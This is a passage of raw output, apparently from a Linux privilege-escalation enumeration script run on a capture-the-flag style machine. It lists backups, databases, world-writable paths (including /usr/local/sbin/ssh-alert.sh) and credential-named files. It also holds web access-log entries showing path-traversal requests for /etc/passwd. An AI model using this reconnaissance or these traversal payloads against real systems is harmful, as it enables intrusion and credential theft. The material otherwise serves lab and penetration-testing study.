-rw-r--r-- 1 root root 14182 Apr 18 12:05 /usr/share/info/dir.old
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 1513 Oct 20 2013 /usr/share/doc/libipc-system-simple-perl/examples/rsync-backup.pl
-rw-r--r-- 1 root root 2505 Apr 15 2018 /usr/share/help/C/gnome-help/backup-what.page
-rw-r--r-- 1 root root 3318 Apr 15 2018 /usr/share/help/C/gnome-help/backup-thinkabout.page
-rw-r--r-- 1 root root 1320 Apr 15 2018 /usr/share/help/C/gnome-help/backup-restore.page
-rw-r--r-- 1 root root 2356 Apr 15 2018 /usr/share/help/C/gnome-help/backup-how.page
-rw-r--r-- 1 root root 1262 Apr 15 2018 /usr/share/help/C/gnome-help/backup-why.page
-rw-r--r-- 1 root root 1815 Apr 15 2018 /usr/share/help/C/gnome-help/backup-check.page
-rw-r--r-- 1 root root 1999 Apr 15 2018 /usr/share/help/C/gnome-help/backup-frequency.page
-rw-r--r-- 1 root root 2268 Apr 15 2018 /usr/share/help/C/gnome-help/backup-where.page
-rw-r--r-- 1 root root 35544 Mar 25 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 217574 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/.config.old
-rw-r--r-- 1 root root 0 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 8881 Mar 24 16:53 /lib/modules/4.15.0-175-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9081 Mar 24 16:53 /lib/modules/4.15.0-175-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/sendmail.cf.bak
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/submit.cf.bak
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/submit.mc.bak
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/sendmail.mc.bak
ââââââââââââĢ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /etc/mail/access.db: regular file, no read permission
Found: /etc/mail/aliases.db: regular file, no read permission
Found: /var/lib/mlocate/mlocate.db: regular file, no read permission
Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3022000
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
ââââââââââââĢ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 7 13:51 .
drwxr-xr-x 13 root root 4.0K Apr 7 13:51 ..
drwxr-xr-x 3 root root 4.0K Apr 18 12:05 html
/var/www/html:
total 36K
drwxr-xr-x 3 root root 4.0K Apr 18 12:05 .
drwxr-xr-x 3 root root 4.0K Apr 7 13:51 ..
ââââââââââââĢ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug 6 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 1531 Jan 5 10:44 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 landscape landscape 0 Aug 6 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 20 Apr 29 11:38 /run/cloud-init/.instance-id
-rw-r--r-- 1 root root 2 Apr 29 11:38 /run/cloud-init/.ds-identify.result
-rw-r--r-- 1 root root 0 Apr 29 11:38 /run/network/.ifstate.lock
ââââââââââââĢ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 292232 Jan 6 17:36 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 6795 Jan 5 15:02 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 2836 Jan 8 06:25 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 6805 Jan 8 16:57 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 255 Jan 14 10:20 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 63790 Apr 7 12:08 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/sendmail.cf.bak
-rw-r--r-- 1 root root 7063 Jan 14 14:24 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 147 Jan 5 10:51 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 6841 Apr 3 13:39 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/submit.cf.bak
-rw-r--r-- 1 root root 525 Jan 5 10:49 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 228 Jan 5 10:49 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/submit.mc.bak
-rw-r--r-- 1 root root 71680 Feb 1 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 7074 Jan 20 13:56 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/sendmail.mc.bak
-rw-r--r-- 1 root root 1112222 Feb 1 05:35 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 7063 Feb 1 05:45 /var/backups/apt.extended_states.2.gz
ââââââââââââĢ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/svc_acc
/run/lock
/run/screen
/run/sendmail/mta/smsocket
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/tmux-1000
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory
/usr/local/sbin
/usr/local/sbin/ssh-alert.sh
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/avahi-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-init.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ModemManager.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/NetworkManager.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sendmail.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/web-app.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/wpa_supplicant.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/mail
/var/tmp
ââââââââââââĢ Interesting GROUP writable files (not in Home) (max 500)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
ââââââââââââĢ Searching passwords in history files
ââââââââââââĢ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/mail/tls/sendmail-common.key
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/pppd/2.4.7/passwordfd.so
/usr/lib/python2.7/dist-packages/keyring/credentials.py
/usr/lib/python2.7/dist-packages/keyring/credentials.pyc
/usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py
/usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0.0.1
/usr/lib/x86_64-linux-gnu/samba/libcmdline-credentials.so.0
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/help/C/gnome-help/user-changepassword.page
/usr/share/help/C/gnome-help/user-goodpassword.page
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/icons/hicolor/16x16/apps/gcr-password.png
/usr/share/icons/hicolor/22x22/apps/gcr-password.png
/usr/share/icons/hicolor/24x24/apps/gcr-password.png
/usr/share/icons/hicolor/256x256/apps/gcr-password.png
/usr/share/icons/hicolor/32x32/apps/gcr-password.png
/usr/share/icons/hicolor/48x48/apps/gcr-password.png
/usr/share/icons/Humanity/apps/24/password.png
/usr/share/icons/Humanity/apps/48/password.svg
/usr/share/icons/Humanity/status/16/dialog-password.png
/usr/share/icons/Humanity/status/24/dialog-password.png
/usr/share/icons/Humanity/status/48/dialog-password.svg
/usr/share/man/man1/git-credential.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-store.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/ubuntu-advantage-tools/modules/credentials.sh
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/pam/password
ââââââââââââĢ Checking for TTY (sudo/su) passwords in audit logs
ââââââââââââĢ Searching passwords inside logs (limit 70)
10.10.14.17 - - [29/Apr/2022:11:43:33 +0000] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:35 +0000] "GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:04 +0000] "GET ../../../../../../../../../../etc/passw* HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:37 +0000] "GET ////////../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:47:05 +0000] "GET /htdocs/../../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
2022-04-29 11:38:43,010 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-04-29 11:38:43,010 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
Binary file /var/log/journal/68ed0714af124461afecf837a54c1b73/user-1000.journal matches